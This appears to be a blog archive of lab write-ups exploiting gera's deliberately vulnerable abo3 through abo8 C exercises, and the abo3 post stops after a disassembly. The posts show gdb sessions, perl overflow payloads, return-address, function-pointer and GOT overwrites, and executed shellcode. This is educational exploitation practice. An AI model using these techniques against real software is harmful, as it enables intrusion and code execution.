
Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief, as there are no significant differences in the solution for abo6.c from other previously covered exercises, while abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate important concepts regarding the placement of variously defined variables within memory for compiled C code which I’ll outline, but it won’t take long.

abo6.c

/* abo6.c                                       *
 * specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is much the same as the last exercise, with one important difference: instead of a call to exit(), the code ends in a while loop that never terminates. In the disassembly, this looks like the following:

0x08048428 <main+68>:   call   0x80482f8 <strcpy@plt>
0x0804842d <main+73>:   mov    eax,DWORD PTR [ebp+12]
0x08048430 <main+76>:   add    eax,0x8
0x08048433 <main+79>:   mov    eax,DWORD PTR [eax]
0x08048435 <main+81>:   mov    DWORD PTR [esp+4],eax
0x08048439 <main+85>:   mov    eax,DWORD PTR [ebp-12]
0x0804843c <main+88>:   mov    DWORD PTR [esp],eax
0x0804843f <main+91>:   call   0x80482f8 <strcpy@plt>
0x08048444 <main+96>:   jmp    0x8048444 <main+96>

So basically, it’s an unconditional jump that targets itself, and therefore it never ends. Since no library function such as exit is called after the second strcpy, overwriting an entry in the GOT or some similar tactic won’t gain us control of execution. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary: we’ll directly overwrite the saved return address of the second strcpy’s stack frame, so that strcpy itself returns to an address of our choosing. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution is that you shouldn’t look up the saved return address of the second strcpy stack frame until you are passing arguments of exactly the same size as the ones you will use for the overwrite, because the location of the saved EIP for that stack frame shifts with the size of the strings passed on the command line. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 <main+0>:    push   ebp
0x080483e5 <main+1>:    mov    ebp,esp
0x080483e7 <main+3>:    sub    esp,0x128
0x080483ed <main+9>:    and    esp,0xfffffff0
0x080483f0 <main+12>:   mov    eax,0x0
0x080483f5 <main+17>:   sub    esp,eax
0x080483f7 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x080483fa <main+22>:   add    eax,0x8
0x080483fd <main+25>:   mov    eax,DWORD PTR [eax]
0x080483ff <main+27>:   mov    DWORD PTR [esp],eax
0x08048402 <main+30>:   call   0x80482e8 <strlen@plt>
0x08048407 <main+35>:   inc    eax
0x08048408 <main+36>:   mov    DWORD PTR [esp],eax
0x0804840b <main+39>:   call   0x8048308 <malloc@plt>
0x08048410 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048413 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048416 <main+50>:   add    eax,0x4
0x08048419 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804841b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804841f <main+59>:   lea    eax,[ebp-0x118]
0x08048425 <main+65>:   mov    DWORD PTR [esp],eax
0x08048428 <main+68>:   call   0x80482f8 <strcpy@plt>
0x0804842d <main+73>:   mov    eax,DWORD PTR [ebp+12]
0x08048430 <main+76>:   add    eax,0x8
0x08048433 <main+79>:   mov    eax,DWORD PTR [eax]
0x08048435 <main+81>:   mov    DWORD PTR [esp+4],eax
0x08048439 <main+85>:   mov    eax,DWORD PTR [ebp-12]
0x0804843c <main+88>:   mov    DWORD PTR [esp],eax
0x0804843f <main+91>:   call   0x80482f8 <strcpy@plt>
---Type <return> to continue, or q <return> to quit---
0x08048444 <main+96>:   jmp    0x8048444 <main+96>
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

abo7.c and abo8.c

As mentioned previously, these two exercises are not exploitable. They highlight where variables are placed in memory depending on how they are declared in C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

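Here buf is an initialized global variable. Using the versatile objdump command you can see pretty easily that, while this is a legitimate buffer overflow (strcpy is unbounded), the location of this variable precludes any useful behavior for taking control of the program. buf sits in .data at 0x080495a0 and runs right up to the end of that section at 0x080496a0. The only thing mapped after it is a 4-byte .bss, while the interesting targets (.dtors, .got, .got.plt) all sit at lower addresses that a forward-running strcpy can’t reach.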

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

I’m a little disconcerted that I’m not sure what Gera was driving at with his hints in this one. I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically-linked executable, you’d still have almost nothing to work with to control execution, because buf still exists in a memory region that’s pretty much useless to have a buffer overflow in. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach; certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution, which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh. This book is a nice resource to have. If you don’t already own it, I’d recommend you purchase a copy and keep it on the shelf, using it as a pre-Google resource or jumping-off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it do what we want, trying to learn something about its implementation to boot.

Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the key to this exercise; as is often the case, he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing buf into the pbuf pointer on the stack, we can essentially control 4 bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code. The important bits are the call to strcpy at main+68 and the call to exit at main+109.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The call to strcpy at main+68 overflows buf and overwrites the pbuf pointer with bytes from the end of the first command line argument (argc[1]; Gera swaps the usual argc and argv names). The instructions from main+73 to main+100 implement the for loop that copies the second command line argument, argc[2], to wherever pbuf now points, and the call at main+109 is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call through a function pointer afterward. So we can’t control execution in that manner. We could overwrite main’s saved return address, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course), but unfortunately there is a pesky call to exit that means main never returns.

Actually, if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is not as clear cut as it seems. It’s actually a call to a small stub that jumps through a pointer in memory…perhaps we can control where that pointer leads?

Dynamic Linking

The reason that this call is exploitable is that the program is dynamically linked. The gist of dynamic linking is that a program can be compiled with references to external functions (functions declared in a header such as stdio.h and implemented in a separately compiled library, printf for instance) which are resolved at load time or run time, which is why you may sometimes hear it referred to as run time linking. (Linking and loading are beyond the scope of this article, and indeed my knowledge.) This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that the C or C++ standards specify must be available, and they allow those functions to be shared among multiple programs without compiling them directly into each executable. This provides a few advantages. Off the top of my head, the most obvious ones are that you can fix a bug in a commonly used function once and have the fix propagate to a bunch of other code automatically, and that you reduce the compiled size and complexity of a given code base.

In all of these operating systems that use dynamic linking there is some sort of look up table that allows programs to resolve run time linked functions. In Linux and UNIX this look up table is called the GOT, or Global Offset Table, and it works in close conjunction with another structure called the Procedure Linkage Table, or PLT.

Taking a Look Under the Hood

There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got displayed the call to 0x804833c, which is the location of exit in the aforementioned PLT. So we’ll examine the instruction at that address, which is an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. That value is just the next instruction in the same PLT stub (0x804833c plus the 6 bytes of the jmp), because exit has not been resolved yet. If we overwrite that value with the address of some shellcode, we’ll have control of execution. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about pointers to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself. Of course the disassembly will prove to be the most fruitful way to attack most problems like this, but it seems to me there’s lots of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, this was declared so that we could use the unary address-of operator on puts and system (declared in stdio.h and stdlib.h respectively) without including either header. I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line, where the function pointer fn is initialized to the address of system. I should email him and ask, but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the usage within main of malloc to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here. Essentially, what this code is doing is declaring a pointer to char (1 byte size, for the purposes of pointer arithmetic) and pointing it at the block of memory returned by malloc. The size of that block, going by malloc’s argument, is the length of the second argument submitted to main plus one byte…this is done to leave room for the terminating NUL byte that strcpy copies along with the string, otherwise strcpy would write one byte past the end of the chunk.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 <main+0>: push ebp
0x08048445 <main+1>: mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d <main+9>: and esp,0xfffffff0
0x08048450 <main+12>: mov eax,0x0
0x08048455 <main+17>: sub esp,eax
0x08048457 <main+19>: mov eax,DWORD PTR [ebp+12]
0x0804845a <main+22>: add eax,0x8
0x0804845d <main+25>: mov eax,DWORD PTR [eax]
0x0804845f <main+27>: mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 <main+35>: inc eax
0x08048468 <main+36>: mov DWORD PTR [esp],eax
0x0804846b <main+39>: call 0x8048360 <malloc@plt>
0x08048470 <main+44>: mov DWORD PTR [ebp-12],eax
0x08048473 <main+47>: mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d <main+57>: mov eax,DWORD PTR [ebp+12]
0x08048480 <main+60>: add eax,0x4
0x08048483 <main+63>: mov eax,DWORD PTR [eax]
0x08048485 <main+65>: mov DWORD PTR [esp+4],eax
0x08048489 <main+69>: lea eax,[ebp-0x118]
0x0804848f <main+75>: mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 <main+83>: mov eax,DWORD PTR [ebp+12]
0x0804849a <main+86>: add eax,0x8
0x0804849d <main+89>: mov eax,DWORD PTR [eax]
0x0804849f <main+91>: mov DWORD PTR [esp+4],eax
0x080484a3 <main+95>: mov eax,DWORD PTR [ebp-12]
0x080484a6 <main+98>: mov DWORD PTR [esp],eax
0x080484a9 <main+101>: call 0x8048350 <strcpy@plt>
0x080484ae <main+106>: mov eax,DWORD PTR [ebp+12]
0x080484b1 <main+109>: add eax,0xc
0x080484b4 <main+112>: mov eax,DWORD PTR [eax]
0x080484b6 <main+114>: mov DWORD PTR [esp],eax
0x080484b9 <main+117>: mov eax,ds:0x80496bc
0x080484be <main+122>: call eax
0x080484c0 <main+124>: jmp 0x80484c0 <main+124>
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two unbounded strcpy calls, and then a call through the function pointer fn, which is stored at 0x80496bc…if we can somehow modify the address stored there, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x &buf
0xbffff730: 0x080481b0
(gdb) x &pbuf
0xbffff83c: 0xb8000ff4
(gdb) x &fn
0x80496bc <fn>: 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing…first it copies, via an insecure function, an unbounded amount of data to the stack. That same stack holds the pointer that a second insecure function will use as its destination. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary write-able location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.

Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept detailing the control of the EIP register. What we are doing is submitting the first argument (the string copied by the first copy function) as a 272-byte string: 268 bytes of junk to get us to pbuf, and then the address of the fn pointer, which overwrites pbuf. Then we’ll submit the second argument, which is what will overwrite fn, as 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone as it will never get used. Upon execution, it attempts to call the value stored at fn, and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode to execute in an environment variable and determining its address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x &fn
0x80496bc <fn>: 0x41414141

Insecure Programming by Example: abo3.c

Updated 03/20/2010 to add an excellent introduction to pointers in C and C++.

The theme for this exercise was provided by one of the folks I follow on Twitter.

@kpyke: And so sayeth the @pusscat: “If you gave me the source code, I’d just compile it and look at it in a debugger anyways…”

This got me thinking, especially in the context of this challenge, that the source code sometimes isn’t all that useful. That is certainly true of this exercise. And maybe this is a milestone in my understanding of “how shit works”, but I have a feeling I’ll be spending a lot more time with the built-in disassemblers in gdb/Ollydbg/Windbg than with a listing of the source. This time, we’ll be working on abo3.c, the next in gera’s series on Insecure Programming. I’m aiming for brevity from now on in these posts so they are not so much work (I’m lazy), so let’s get straight to the code.

gera says:

microprocessor ownership

How to make the microprocessor make what you want? Who owns the Instruction Pointer, owns the execution flow, and that’s what we need. All bytes are composed of bits, but some of them are just numbers, and some of them are addresses to code. Jump! Geronimoooooooooo…

/* abo3.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step                     */

int main(int argv,char **argc) {
   extern system,puts;
   void (*fn)(char*)=(void(*)(char*))&system;
   char buf[256];

   fn=(void(*)(char*))&puts;
   strcpy(buf,argc[1]);
   fn(argc[2]);
   exit(1);
}

gera continues:

buf is in the stack, and after it are some bits you can change, that you’ve learnt in abo1.

In case you wonder why we put that there, is so the linker doesn’t remove it.

This exercise makes use of a couple of things we haven’t covered in previous posts. One, this code uses the extern keyword in the C language to make the system and puts functions available. What this does (I think) is declare that the names are defined somewhere else, so the code can take their addresses without including the header files that normally declare them (stdlib.h for system and stdio.h for puts); the linker then resolves both against the C library. One thing that is not immediately clear from the source is that the system and puts addresses are both written to the same location, one after the other; I think the first assignment might be what gera is talking about with “so the linker doesn’t remove it”. Secondly, this code makes extensive use of pointers in C, which is a subject I probably need to learn a lot more on. As a quick summary, pointers contain a memory address, and have various unary operators that apply to them. For a pointer named (creatively) POINTER, you could use the & or address-of operator to get the address of the pointer variable itself (&POINTER), you could use POINTER without any operators to get the memory address that POINTER contains, or you could dereference it using the * operator, like *POINTER, to get the data stored at the address the pointer references. Pointers can get nested, and be generally confusing. You should read up on this, as it’s an important subject, and I’m not speaking from a great deal of experience.

As is always the case, we’ll not focus too much on the high-level representation of this code, rather, we’ll disassemble it in GDB. Here is a deadlist of the compiled executable.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.

